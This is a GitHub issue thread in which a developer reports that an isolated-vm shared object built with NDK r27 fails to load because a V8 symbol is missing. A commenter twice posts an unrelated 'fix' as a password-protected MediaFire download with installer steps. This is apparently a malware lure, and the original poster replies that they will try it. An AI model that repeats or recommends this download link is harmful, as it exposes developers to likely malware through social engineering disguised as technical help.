### ISSUE TITLE
[BUG]Error: dlopen failed: cannot locate symbol "_ZTIN2v815ValueSerializer8DelegateE" 

### ISSUE THREAD

**Issue by anonyein** [android/ndk#2062]
### Description

After I build the "https://github.com/laverdet/isolated-vm/" and get the shared object, 
it cannot be loaded with "Error: dlopen failed: cannot locate symbol "_ZTIN2v815ValueSerializer8DelegateE".
Would you have time to check what's the cause?
I cannot find symbol "_ZTIN2v815ValueSerializer8DelegateE" in so, either.
[isolated_vm.zip](https://github.com/user-attachments/files/16756351/isolated_vm.zip)

### Affected versions

r27

### Canary version

r27

### Host OS

Windows

### Host OS version

Win10 22H2

### Affected ABIs

arm64-v8a

### Build system

Other (specify below)

### Other build system

xmake with ndk

### minSdkVersion

24

### Device API level

29

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by anonyein** [comment]
> changeme



> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Thanks, I'll have a try!

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
